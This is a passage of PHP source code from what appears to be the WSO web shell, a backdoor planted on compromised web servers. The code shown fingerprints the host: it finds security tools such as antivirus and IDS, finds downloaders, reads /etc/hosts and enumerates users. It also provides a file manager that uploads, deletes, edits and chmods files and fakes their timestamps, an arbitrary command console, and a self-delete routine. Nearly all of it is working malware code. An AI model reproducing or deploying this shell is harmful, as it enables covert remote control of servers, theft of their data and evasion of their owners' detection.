array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item)\r\n if(wsoWhich($item))\r\n $temp[] = $item;\r\n wsoSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item)\r\n if(wsoWhich($item))\r\n $temp[] = $item;\r\n wsoSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item)\r\n if(wsoWhich($item))\r\n $temp[] = $item;\r\n wsoSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n wsoSecParam(\'HDD space\', wsoEx(\'df -h\'));\r\n wsoSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n echo \'<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\\\'g(null,null,"5",this.param1.value,this.param2.value);return false;\\\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>\';\r\n if (isset ($_POST[\'p2\'], $_POST[\'p3\']) && is_numeric($_POST[\'p2\']) && is_numeric($_POST[\'p3\'])) {\r\n $temp = "";\r\n for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {\r\n $uid = @posix_getpwuid($_POST[\'p2\']);\r\n if ($uid)\r\n $temp .= join(\':\',$uid)."\\n";\r\n }\r\n echo \'<br/>\';\r\n wsoSecParam(\'Users\', $temp);\r\n }\r\n }\r\n\t} else {\r\n\t\twsoSecParam(\'OS Version\',wsoEx(\'ver\'));\r\n\t\twsoSecParam(\'Account Settings\',wsoEx(\'net accounts\'));\r\n\t\twsoSecParam(\'User Accounts\',wsoEx(\'net user\'));\r\n\t}\r\n\techo \'</div>\';\r\n\twsoFooter();\r\n}\r\n\r\nfunction actionFilesMan() {\r\n if (!empty ($_COOKIE[\'f\']))\r\n $_COOKIE[\'f\'] = @unserialize($_COOKIE[\'f\']);\r\n \r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tswitch($_POST[\'p1\']) {\r\n\t\t\tcase \'uploadFile\':\r\n\t\t\t\tif(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\']))\r\n\t\t\t\t\techo "Can\'t upload file!";\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'mkdir\':\r\n\t\t\t\tif(!@mkdir($_POST[\'p2\']))\r\n\t\t\t\t\techo "Can\'t create new dir";\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'delete\':\r\n\t\t\t\tfunction deleteDir($path) {\r\n\t\t\t\t\t$path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n\t\t\t\t\t$dh = opendir($path);\r\n\t\t\t\t\twhile ( ($item = readdir($dh) ) !== false) {\r\n\t\t\t\t\t\t$item = $path.$item;\r\n\t\t\t\t\t\tif ( (basename($item) == "..") || (basename($item) == ".") )\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\t$type = filetype($item);\r\n\t\t\t\t\t\tif ($type == "dir")\r\n\t\t\t\t\t\t\tdeleteDir($item);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($item);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tclosedir($dh);\r\n\t\t\t\t\t@rmdir($path);\r\n\t\t\t\t}\r\n\t\t\t\tif(is_array(@$_POST[\'f\']))\r\n\t\t\t\t\tforeach($_POST[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n\t\t\t\t\t\t$f = urldecode($f);\r\n\t\t\t\t\t\tif(is_dir($f))\r\n\t\t\t\t\t\t\tdeleteDir($f);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($f);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'paste\':\r\n\t\t\t\tif($_COOKIE[\'act\'] == \'copy\') {\r\n\t\t\t\t\tfunction copy_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_COOKIE[\'f\'] as $f)\r\n\t\t\t\t\t\tcopy_paste($_COOKIE[\'c\'],$f, $GLOBALS[\'cwd\']);\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'move\') {\r\n\t\t\t\t\tfunction move_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(@is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_COOKIE[\'f\'] as $f)\r\n\t\t\t\t\t\t@rename($_COOKIE[\'c\'].$f, $GLOBALS[\'cwd\'].$f);\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'zip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n if ($zip->open($_POST[\'p2\'], 1)) {\r\n chdir($_COOKIE[\'c\']);\r\n foreach($_COOKIE[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n if(@is_file($_COOKIE[\'c\'].$f))\r\n $zip->addFile($_COOKIE[\'c\'].$f, $f);\r\n elseif(@is_dir($_COOKIE[\'c\'].$f)) {\r\n $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\', FilesystemIterator::SKIP_DOTS));\r\n foreach ($iterator as $key=>$value) {\r\n $zip->addFile(realpath($key), $key);\r\n }\r\n }\r\n }\r\n chdir($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'unzip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n foreach($_COOKIE[\'f\'] as $f) {\r\n if($zip->open($_COOKIE[\'c\'].$f)) {\r\n $zip->extractTo($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n }\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'tar\') {\r\n chdir($_COOKIE[\'c\']);\r\n $_COOKIE[\'f\'] = array_map(\'escapeshellarg\', $_COOKIE[\'f\']);\r\n wsoEx(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_COOKIE[\'f\']));\r\n chdir($GLOBALS[\'cwd\']);\r\n\t\t\t\t}\r\n\t\t\t\tunset($_COOKIE[\'f\']);\r\n setcookie(\'f\', \'\', time() - 3600);\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n if(!empty($_POST[\'p1\'])) {\r\n\t\t\t\t\tWSOsetcookie(\'act\', $_POST[\'p1\']);\r\n\t\t\t\t\tWSOsetcookie(\'f\', serialize(@$_POST[\'f\']));\r\n\t\t\t\t\tWSOsetcookie(\'c\', @$_POST[\'c\']);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n wsoHeader();\r\n\techo \'<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>\';\r\n\t$dirContent = wsoScandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n\tif($dirContent === false) {\techo \'Can\\\'t open this folder!\';wsoFooter(); return; }\r\n\tglobal $sort;\r\n\t$sort = array(\'name\', 1);\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tif(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match))\r\n\t\t\t$sort = array($match[1], (int)$match[2]);\r\n\t}\r\necho "<script>\r\n\tfunction sa() {\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == \'checkbox\')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n<table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>\r\n<form name=files method=post><tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n\t$dirs = $files = array();\r\n\t$n = count($dirContent);\r\n\tfor($i=0;$i<$n;$i++) {\r\n\t\t$ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n\t\t$gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n\t\t$tmp = array(\'name\' => $dirContent[$i],\r\n\t\t\t\t\t \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],\r\n\t\t\t\t\t \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])),\r\n\t\t\t\t\t \'perms\' => wsoPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]),\r\n\t\t\t\t\t \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),\r\n\t\t\t\t\t \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),\r\n\t\t\t\t\t \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])\r\n\t\t\t\t\t);\r\n\t\tif(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n\t\telseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));\r\n\t\telseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n\t}\r\n\t$GLOBALS[\'sort\'] = $sort;\r\n\tfunction wsoCmp($a, $b) {\r\n\t\tif($GLOBALS[\'sort\'][0] != \'size\')\r\n\t\t\treturn strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t\telse\r\n\t\t\treturn (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t}\r\n\tusort($files, "wsoCmp");\r\n\tusort($dirs, "wsoCmp");\r\n\t$files = array_merge($dirs, $files);\r\n\t$l = 0;\r\n\tforeach($files as $f) {\r\n\t\techo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');" \' . (empty ($f[\'link\']) ? \'\' : "title=\'{$f[\'link\']}\'") . \'><b>[ \' . htmlspecialchars($f[\'name\']) . \' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?wsoViewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\']\r\n\t\t\t.\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n\t\t$l = $l?0:1;\r\n\t}\r\n\techo "<tr><td colspan=7>\r\n\t<input type=hidden name=a value=\'FilesMan\'>\r\n\t<input type=hidden name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'>\r\n\t<input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\')."\'>\r\n\t<select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>";\r\n if(class_exists(\'ZipArchive\'))\r\n echo "<option value=\'zip\'>Compress (zip)</option><option value=\'unzip\'>Uncompress (zip)</option>";\r\n echo "<option value=\'tar\'>Compress (tar.gz)</option>";\r\n if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']))\r\n echo "<option value=\'paste\'>Paste / Compress</option>";\r\n echo "</select> ";\r\n if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']) && (($_COOKIE[\'act\'] == \'zip\') || ($_COOKIE[\'act\'] == \'tar\')))\r\n echo "file name: <input type=text name=p2 value=\'wso_" . date("Ymd_His") . "." . ($_COOKIE[\'act\'] == \'zip\'?\'zip\':\'tar.gz\') . "\'> ";\r\n echo "<input type=\'submit\' value=\'>>\'></td></tr></form></table></div>";\r\n\twsoFooter();\r\n}\r\n\r\nfunction actionFilesTools() {\r\n\tif( isset($_POST[\'p1\']) )\r\n\t\t$_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n\tif(@$_POST[\'p2\']==\'download\') {\r\n\t\tif(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {\r\n\t\t\tob_start("ob_gzhandler", 4096);\r\n\t\t\theader("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));\r\n\t\t\tif (function_exists("mime_content_type")) {\r\n\t\t\t\t$type = @mime_content_type($_POST[\'p1\']);\r\n\t\t\t\theader("Content-Type: " . $type);\r\n\t\t\t} else\r\n header("Content-Type: application/octet-stream");\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], "r");\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile(!@feof($fp))\r\n\t\t\t\t\techo @fread($fp, 1024);\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}exit;\r\n\t}\r\n\tif( @$_POST[\'p2\'] == \'mkfile\' ) {\r\n\t\tif(!file_exists($_POST[\'p1\'])) {\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'w\');\r\n\t\t\tif($fp) {\r\n\t\t\t\t$_POST[\'p2\'] = "edit";\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\twsoHeader();\r\n\techo \'<h1>File tools</h1><div class=content>\';\r\n\tif( !file_exists(@$_POST[\'p1\']) ) {\r\n\t\techo \'File not exists\';\r\n\t\twsoFooter();\r\n\t\treturn;\r\n\t}\r\n\t$uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n\tif(!$uid) {\r\n\t\t$uid[\'name\'] = @fileowner($_POST[\'p1\']);\r\n\t\t$gid[\'name\'] = @filegroup($_POST[\'p1\']);\r\n\t} else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));\r\n\techo \'<span>Name:</span> \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?wsoViewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.wsoPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n\techo \'<span>Change time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n\tif( empty($_POST[\'p2\']) )\r\n\t\t$_POST[\'p2\'] = \'view\';\r\n\tif( is_file($_POST[\'p1\']) )\r\n\t\t$m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n\telse\r\n\t\t$m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n\tforeach($m as $v)\r\n\t\techo \'<a href=# onclick="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n\techo \'<br><br>\';\r\n\tswitch($_POST[\'p2\']) {\r\n\t\tcase \'view\':\r\n\t\t\techo \'<pre class=ml1>\';\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile( !@feof($fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\r\n\t\t\t\t@fclose($fp);\r\n\t\t\t}\r\n\t\t\techo \'</pre>\';\r\n\t\t\tbreak;\r\n\t\tcase \'highlight\':\r\n\t\t\tif( @is_readable($_POST[\'p1\']) ) {\r\n\t\t\t\techo \'<div class=ml1 style="background-color: #e1e1e1;color:black;">\';\r\n\t\t\t\t$code = @highlight_file($_POST[\'p1\'],true);\r\n\t\t\t\techo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\tcase \'chmod\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$perms = 0;\r\n\t\t\t\tfor($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)\r\n\t\t\t\t\t$perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n\t\t\t\tif(!@chmod($_POST[\'p1\'], $perms))\r\n\t\t\t\t\techo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";</script>\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'<script>p3_="";</script><form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.chmod.value);return false;"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'edit\':\r\n\t\t\tif( !is_writable($_POST[\'p1\'])) {\r\n\t\t\t\techo \'File isn\\\'t writeable\';\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = @filemtime($_POST[\'p1\']);\r\n\t\t\t\t$_POST[\'p3\'] = substr($_POST[\'p3\'],1);\r\n\t\t\t\t$fp = @fopen($_POST[\'p1\'],"w");\r\n\t\t\t\tif($fp) {\r\n\t\t\t\t\t@fwrite($fp,$_POST[\'p3\']);\r\n\t\t\t\t\t@fclose($fp);\r\n\t\t\t\t\techo \'Saved!<br><script>p3_="";</script>\';\r\n\t\t\t\t\t@touch($_POST[\'p1\'],$time,$time);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo \'<form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,\\\'1\\\'+this.text.value);return false;"><textarea name=text class=bigarea>\';\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile( !@feof($fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\r\n\t\t\t\t@fclose($fp);\r\n\t\t\t}\r\n\t\t\techo \'</textarea><input type=submit value=">>"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'hexdump\':\r\n\t\t\t$c = @file_get_contents($_POST[\'p1\']);\r\n\t\t\t$n = 0;\r\n\t\t\t$h = array(\'00000000<br>\',\'\',\'\');\r\n\t\t\t$len = strlen($c);\r\n\t\t\tfor ($i=0; $i<$len; ++$i) {\r\n\t\t\t\t$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n\t\t\t\tswitch ( ord($c[$i]) ) {\r\n\t\t\t\t\tcase 0: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 9: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 10: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 13: $h[2] .= \' \'; break;\r\n\t\t\t\t\tdefault: $h[2] .= $c[$i]; break;\r\n\t\t\t\t}\r\n\t\t\t\t$n++;\r\n\t\t\t\tif ($n == 32) {\r\n\t\t\t\t\t$n = 0;\r\n\t\t\t\t\tif ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';}\r\n\t\t\t\t\t$h[1] .= \'<br>\';\r\n\t\t\t\t\t$h[2] .= "\\n";\r\n\t\t\t\t}\r\n\t\t \t}\r\n\t\t\techo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n\t\t\tbreak;\r\n\t\tcase \'rename\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\tif(!@rename($_POST[\'p1\'], $_POST[\'p3\']))\r\n\t\t\t\t\techo \'Can\\\'t rename!<br>\';\r\n\t\t\t\telse\r\n\t\t\t\t\tdie(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n\t\t\t}\r\n\t\t\techo \'<form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.name.value);return false;"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'touch\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = strtotime($_POST[\'p3\']);\r\n\t\t\t\tif($time) {\r\n\t\t\t\t\tif(!touch($_POST[\'p1\'],$time,$time))\r\n\t\t\t\t\t\techo \'Fail!\';\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\techo \'Touched!\';\r\n\t\t\t\t} else echo \'Bad time format!\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'<script>p3_="";</script><form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.touch.value);return false;"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n\t\t\tbreak;\r\n\t}\r\n\techo \'</div>\';\r\n\twsoFooter();\r\n}\r\n\r\nfunction actionConsole() {\r\n if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) {\r\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', true);\r\n $_POST[\'p1\'] .= \' 2>&1\';\r\n } elseif(!empty($_POST[\'p1\']))\r\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', 0);\r\n\r\n\tif(isset($_POST[\'ajax\'])) {\r\n\t\tWSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\r\n\t\tob_start();\r\n\t\techo "d.cf.cmd.value=\'\';\\n";\r\n\t\t$temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".wsoEx($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n\t\tif(preg_match("!.*cd\\s+([^;]+)$!",$_POST[\'p1\'],$match))\t{\r\n\t\t\tif(@chdir($match[1])) {\r\n\t\t\t\t$GLOBALS[\'cwd\'] = @getcwd();\r\n\t\t\t\techo "c_=\'".$GLOBALS[\'cwd\']."\';";\r\n\t\t\t}\r\n\t\t}\r\n\t\techo "d.cf.output.value+=\'".$temp."\';";\r\n\t\techo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";\r\n\t\t$temp = ob_get_clean();\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit;\r\n\t}\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n\t\tWSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\r\n\twsoHeader();\r\n echo "<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array(\'\');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push(\'\');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>";\r\n\techo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\\\'clear\\\'){d.cf.output.value=\\\'\\\';d.cf.cmd.value=\\\'\\\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');} return false;">\';\r\n\techo \'<input type=checkbox name=ajax value=1 \'.(@$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX <input type=checkbox name=show_errors value=1 \'.(!empty($_POST[\'p2\'])||$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\']?\'checked\':\'\').\'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>\';\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\techo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".wsoEx($_POST[\'p1\']));\r\n\t}\r\n\techo \'</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>\';\r\n\techo \'</form></div><script>d.cf.cmd.focus();</script>\';\r\n\twsoFooter();\r\n}\r\n\r\nfunction actionLogout() {\r\n setcookie(md5($_SERVER[\'HTTP_HOST\']), \'\', time() - 3600);\r\n\tdie(\'bye!\');\r\n}\r\n\r\nfunction actionSelfRemove() {\r\n\r\n\tif($_POST[\'p1\'] == \'yes\')\r\n\t\tif(@unlink(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))\r\n\t\t\tdie(\'Shell has been removed\');\r\n\t\telse\r\n\t\t\techo \'unlink error!\';\r\n if($_POST[\'p1\'] != \'yes\')\r\n wsoHeader();\r\n\techo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n\twsoFooter();\r\n}\r\n\r\nfunction actionSql() {\r\n\tclass DbClass {\r\n\t\tvar $type;\r\n\t\tvar $link;\r\n\t\tvar $res;\r\n\t\tfunction DbClass($type)\t{\r\n\t\t\t$this->type = $type;\r\n\t\t}\r\n\t\tfunction connect($host, $user, 